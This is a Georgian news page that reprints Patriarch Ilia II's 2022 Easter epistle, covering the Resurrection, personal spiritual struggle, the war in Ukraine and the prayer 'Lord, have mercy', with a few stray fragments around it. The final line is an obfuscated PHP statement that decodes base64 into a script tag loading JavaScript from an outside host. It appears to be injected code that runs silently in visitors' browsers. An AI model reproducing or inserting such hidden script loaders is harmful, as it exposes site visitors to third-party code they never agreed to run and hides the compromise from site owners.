celsiusi
ავერსი შნაიდერი
სრულიად საქართველოს კათოლიკოს-პატრიარქის, მცხეთა-თბილისის მთავარეპისკოპოსის და ბიჭვინთისა და ცხუმ-აფხაზეთის მიტროპოლიტის, ილია მეორის სააღდგომო ეპისტოლეს საინფორმაციო სააგენტო BUSINESS TIME უცვლელად გთავაზობთ:
 
"ყოვლადსამღვდელონო მღვდელმთავარნო, ღირსნო მოძღვარნო, დიაკონნო, ბერ-მონაზონნო, ხელისუფალნო, საქართველოს წმინდა მართლმადიდებელი ეკლესიის ყოველნო წევრნო, მკვიდრნო ივერიისა და ჩვენი ქვეყნის საზღვრებს გარეთ მცხოვრებნო თანამემამულენო,
 
„გაუწყებთ თქვენ… საუკუნო სიცოცხლეს,
 
რომელიც მამასთან იყო და  ჩვენ გამოგვეცხადა“
 
(1 ინ. 1,2).
 
აღსრულდა სამოთხეში ადამისა და ევასთვის მიცემული პირობა უფლისა! სიკვდილი იძლია!
 
ქრისტე აღსდგა!
 
საკვრელი ბნელეთისა დარღვეულია და მართალთა სულნი – გამოხსნილნი!
 
ზეიმობს წიაღი აბრაამისა; ძეს თვისას, ყოველთა მეუფეს, შეჰხარის წინასწარმეტეყველი დავითი, იშვებს ქალწული და ყოველნი ზეციურნი ძალნი!
 
შემოდის დღე ძლევამოსილი და  დიადი, დღე სიკვდილის დამთრგუნველი და ათასწლეულების წყევლის განმაქარვებელი.
 
ეშმაკი მოტყუვდა, როდესაც ჩვეულებრივი ადამიანის მსგავსად მიიღო თავის წიაღში კაცობრივი სულის მქონე უფალი,- ყოვლად უცოდველი, სრული სიყვარული, სიკეთე, სიბრძნე და ჭეშმარიტება, რომელმაც ჯოჯოხეთში შთასვლით შემუსრა ბოროტების, ღვარძლისა და სიცრუის სამეფო.
 
ქრისტე აღსდგა!
 
„სადა არს, სიკვდილო, ნესტარი შენი, სადა არს, ჯოჯოხეთო, ძლევაი შენი?!“ (1 კორინ. 35.55)
 
მკვდრეთით აღმდგარი და გამარჯვებული იესო გვიხმობს და ყველას უშურველად გვანიჭებს უდიდეს საბოძვარს, – საუფლო დიდებასთან თანაზიარებას, გვანიჭებს მარადიულ სიცოცხლეს და მასთან მყოფობას.
 
ქრისტე მკვდრეთით აღსდგა იმგვარი უხრწნელი სხეულით,  ადამს რომ ჰქონდა სამოთხეში და ჩვენც, მეორედ მოსვლის შემდეგ, ამ სულიერი სხეულით შემოსვის შესაძლებლობა მოგვცა.
 
ეს არის უმნიშვნელოვანესი მოვლენა, რადგან ხრწნილება, რაც პირველმშობელთა შეცოდების შედეგად ჩვენი დაცემული ბუნების თვისება გახდა, ვერ დაიმკვიდრებდა უკვდავებას.
 
ქრისტესთან  ნათლობით დაკავშირებულნი და მისი მცნებისამებრ მცხოვრებნი ყოველნი, ნეტარ უკვდავებასთან თანაზიარნი ხდებიან მასთან ერთობით, რომელიც თავად არის სიცოცხლე და სიცოცხლის მომნიჭებელი.  ამიტომაც წერს მოციქული: „როგორც ადამში კვდება ყველა, ასევე სიცოცხლეს იძენენ ქრისტეში“               (1 კორინ. 15,22); „ღმერთმა მოგვცა საუკუნო სიცოცხლე და ეს სიცოცხლე მის ძეშია“ (1 ინ. 5,11).
 
***
 
ჩვენთვის რომ გადარჩენის ერთადერთი გზა მოეპოვებინა, მაცხოვარმა  უდიდესი დამცირება, ცილისწამება და ტანჯვა დაითმინა და საკუთარი თავის მსხვერპლად გაღებით  გამოგვიხსნა ჯოჯოხეთის ტყვეობისგან.
 
მართალია, ქრისტეს აღდგომით ბოროტება შეიმუსრა, მაგრამ  განწმენდისა და ცოდვის ბიწისაგან გათავისუფლების პროცესი სულიერი ღვაწლითა და მრავალი განსაცდელის ღირსეულად დათმენით ყველამ პიროვნულადაც უნდა აღვასრულოთ, – უნდა ძალისამებრ ჩვენისა განვაახლოთ შემოქმედის ხატება და მსგავსება ჩვენში (ანუ  შინაგანად შევძლოთ აღდგენა იმისა, როგორადაც შეგვქმნა უფალმა), რაც, პირველ რიგში, გულისხმობს ბრძოლას  ჩვენს ეგოისტურ აზროვნებასთან და ვნებებთან.
 
ეს არის გარდაუვალი ომი საკუთარ თავთან, რაც აუცილებლად მოუწევს ყველას, ვინც თავს ქრისტიანად მიიჩნევს.
 
ამ ომში გამარჯვება  წარმოუდგენელია ღვთის შემწეობის გარეშე, სიკვდილის დამთრგუნველი უფლის რწმენის გარეშე, რადგან საწუთრო და მისი საცდურნი იოლად არ ანებებენ თავს ადამიანს და მრავალგვარ მახეს უგებენ ცრუ თავისუფლების სახელით. წუთისოფელი და მისი წარმავალი სიკეთენი ჩვენს დაცემულ ბუნებას თავისკენ იზიდავს და  ცოდვის მორევში ადვილად აქცევს მრავალთ.
 
სულ სხვაა მორწმუნეთა ცხოვრება. ესაა მუდმივი სვლა მდინარის საწინააღმდეგო მიმართულებით, რწმენისა და სიმართლის ვიწრო გზით; და ისინი, საკუთარ თავთან ბრძოლაში გამარჯვებულნი, სძლევენ წუთისოფელს ( 1 ინ. 5,4).
 
მაგრამ ადამიანთა უმრავლესობა ომს თავის თავთან კი არ აწარმოებს, არამედ მოყვასთან და შუღლითა და დაპირისპირებით ცდილობს საკუთარი ეგოისტური მიზნების განხორციელებას.
 
***
 
დიდი უბედურების მომტანია ქვეყნებს შორის ომი, რადგან იგი ათასობით ადამიანის სიცოცხლეს იწირავს, ფეხქვეშ თელავს ყოველგვარ კანონს, ზნეობას, ღირებულებას, მოაქვს ნგრევა და მატერიალურ-კულტურული ზიანი, თესავს სისასტიკესა და საყოველთაო სიძულვილს, რაც, რა თქმა უნდა, სულიერადაც მეტად მძიმე ვითარებას ქმნის.
 
ასეთ გარემოში მნიშვნელოვანია და აუცილებელი თანალმობისა და სიკეთის გამოჩენა ომის მსხვერპლთა მიმართ (დაჭრილების, ტყვეების, მშიერ-მწყურვალთა, ბავშვების, ქალების, მოხუცების, სნეულთა და სხვათადმი), რათა დაიძლიოს ბოროტება.
 
უდიდეს გულისტკივილს იწვევს დღეს მსოფლიოში მიმდინარე ომები, განსაკუთრებით ჩვენს მეზობლად, რომელსაც რუსეთი აწარმოებს უკრაინაში, სადაც ადგილი აქვს შემზარავ ფაქტებსა და უმძიმეს სისასტიკეს. ამიტომაც, ყველას გვმართებს განსაკუთრებული ლოცვა და ძალისხმევა   მშვიდობისათვის.
 
ამჟამად არსებული მდგომარეობა კი ისეთია, როდესაც აღარავინ იცის, ხვალინდელი დღე რას მოიტანს და მოვლენები როგორ განვითარდება; პროცესები შეიძლება მალე დასრულდეს, ან ხანგრძლივ დაპირისპირებაში გადაიზარდოს,  ან, შეიძლება, ყველანი გლობალური კატასტროფის წინაშე აღმოვჩნდეთ, რაც, ბუნებრივია, საყოველთაო შიშს ბადებს.
 
მაგრამ არ უნდა დაგვავიწყდეს, რომ ურთულესი ვითარებიდან უფალს მრავალჯერ  დაუხსნია კაცობრიობა; მთავარია, უმძიმეს მდგომარეობაშიც არ დავკარგოთ ადამიანური ღირსებები, არ დავკარგოთ რწმენა და სასოება შემოქმედისა.
 
****
 
ზოგადად, შიში, როგორც გადარჩენის ინსტიქტი, კაცობრიობის მუდმივი თანამგზავრია, ყველაზე ძლიერი კი სიკვდილის შიშია, რაც ჩვენი ბუნებრივი მდგომარეობაა, რადგან სულისა და ხორცის გაყრასთან არის დაკავშირებული და მათი ერთობის დამრღვევია.
 
თუმცა ქრისტეს მორწმუნეთ იციან, რომ სხეულის დაფვლა მიწაში და სტიქიონებად დაშლა ჩვენი არსებობის შეწყვეტას არ ნიშნავს, არამედ ეს პროცესი  აუცილებელია, რათა სხეული განახლებული სახით აღდგეს.
 
ზოგიერთ ადამიანს უჭირს ამის დაჯერება, პავლე მოციქული მოკლედ და ნათლად ამბობს, რომ: „რასაც დავთესავთ, არ გაცოცხლდება, თუ არ მოკვდა“ (1 კორინ.15, 36). ასევეა მკვდართა აღდგომაც  … „ითესება მშვინვიერი სხეული და აღდგება სულიერი სხეული“ (1 კორინ.15, 44), ხოლო ვისაც ეს აეჭვებს, ის დაეჭვებულია ქრისტეს აღდგომაშიც, „რადგან თუ მკვდარნი არ აღდგებიან, ქრისტეც არ აღმდგარა“ (1 კორინ.15,16)! – მართლმორწმუნისათვის ასეთი აზრი კი უდიდესი მკრეხელობაა და   სულიერად დამღუპველი.
 
აღდგომილი მაცხოვარი არაერთგზის იხილეს მენელსაცხებლე დედებმა, მოციქულებმა, ხუთასზე მეტმა კაცმა და სხვებმა. იგი ორმოცი დღის მანძილზე არიგებდა  და განაბრძნობდა თავის მოწაფეებს, რომელთაც, სულიწმინდის მადლით, მრავალ სასწაულთა აღსრულების უნარი მისცა; შემდეგ კი იესო ქრისტე ყველას თვალწინ ზეცად ამაღლდა და აღგვითქვა: „აჰა, მე თქვენთან ვარ დღენიადაგ, ვიდრე  აღსასრულამდე ქვეყნისა“ (მთ. 28.20), და კიდევ: „ნეტარ არიან ისინი,  ვისაც არ ვუხილავარ და … მირწმუნეს“ (ინ. 20.29)
 
***
 
ქრისტეს სასუფეველი მიუწვდომელი რჩება მათთვის, ვისაც არა აქვს შიში და სიყვარული ღვთისა და, ასევე, სიყვარული მოყვასისა, რაც შედეგია ჩვენი რწმენისა და მოღვაწეობითი ძალისხმევისა.
 
„უფლის შიში სიცოცხლის წყაროა, სიკვდილის ხაფანგისგან გამომხსნელი” (იგ. 14,27). იგი სულიერი სიბრძნის დასაწყისია, რადგან ამ მადლის მქონეთ ეძლევათ სიკეთისა და ბოროტების გარჩევის უნარი, უნარი გონივრული ნაბიჯების გადადგმისა და მშვიდობისმყოფლობისა, მოყვასის სიყვარულისა და მისთვის თავდადებისა.
 
ღვთის შიში სხვა შიშებისაგანაც  ათავისუფლებს ადამიანს და ცხოვრებისეული სირთულეების დაძლევას უადვილებს, რადგან იგი განსაცდელსა და მწუხარებას მისთვის საჭირო მწარე, თუმცა მაკურნებელ, წამლად მიიჩნევს და ეშინია მხოლოდ იმისა, რომ არ შეექმნას სულიერი სიკვდილის საფრთხე (შდრ. მთ. 10,18).
 
ღვთის შიში უფალთან სიახლოვით მტკიცდება, უფრო აღმატებულ სულიერ მდგომარეობაში კი  მას სრული სიყვარული ცვლის, როგორც ამბობს წმინდა იოანე ღვთისმეტყველი: „სიყვარულისთვის უცხოა შიში, რადგანაც სრულქმნილი სიყვარული განდევნის შიშს, … ხოლო ვისაც შიში აქვს, არასრულქმნილია სიყვარულში” (1 ინ. 4.18).
 
სრულქმნილი სიყვარულის მიღწევისათვის ლოცვას უდიდესი მნიშვნელობა აქვს. ყველა საეკლესიო მსახურება გულისხმობს უფლისადმი ვედრებას: „შეგვეწიენ, გვაცხოვნენ, შეგვიწყალენ და დაგვიცევ ჩვენ, ღმერთო, მადლითა შენითა“
 
მოციქული გვარიგებს, – ილოცეთ მუდამ  (1 თეს. 5,17), რაც ადვილი არ არის, მაგრამ არსებობს მარტივი ლოცვა, რომელიც დიდად შეეწევა ადამიანს, თუკი რწმენით აღასრულებს მას.
 
ეს არის  „უფალო, შეგვიწყალენ.“
 
თქვენი ყოველდღიური ლოცვების გარდა, იმეორეთ იგი გულში  ყველგან და ყოველთვის, სადაც არ უნდა იმყოფებოდეთ.
 
ეს ორი სიტყვა ღრმა აზრის შემცველია; მისი საშუალებით ჩვენ ვაღიარებთ, რომ ღმერთს ვართ მინდობილნი და მას შევთხოვთ მფარველობას, რომ ცოდვილნი ვართ, მაგრამ იმედი გვაქვს მისი მოწყალებისა, ვაღიარებთ იმასაც, რომ მის გარეშე ვერც სულიერ სიბრძნეს შევიძენთ და ვერც ბოროტს დავამარცხებთ.
 
ასე რომ, გამუდმებით ილოცეთ – „უფალო, შეგვიწყალენ“ და მარად გახსოვდეთ, რომ „თქვენი სხეული ტაძარია თქვენში დამკვიდრებული სულიწმინდისა, რომელიც გაქვთ ღვთისაგან. …
 
ადიდეთ ღმერთი თქვენი სხეულით და თქვენი სულით, რომელნიც არიან ღვთისა“ (1 კორინ. 6, 19-20);  იღვაწეთ, რომ, წუთისოფელში თქვენი დროებითი მყოფობა ზესთასოფელში დაუსრულებელი მყოფობის წინაპირობად  იქცეს, იცხოვრეთ მარადიული სიცოცხლისათვის, იცხოვრეთ ქრისტესთვის!
 
ქრისტე აღსდგა!
 
მკვდრეთით აღდგომილმა მაცხოვარმა დაგლოცოთ და განგამტკიცოთ რწმენასა და სიყვარულში.
 
იხარეთ ორსავე სოფელსა შინა!
 
სიყვარულით თქვენთვის მლოცველი,
 
ილია II
 
სრულიად საქართველოს კათოლიკოს-პატრიარქი
 
მცხეთა – თბილისის მთავარეპისკოპოსი,
 
ბიჭვინთისა და ცხუმ-აფხაზეთის  მიტროპოლიტი
 
აღდგომა ქრისტესი,
 
თბილისი, 2022." 
693
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");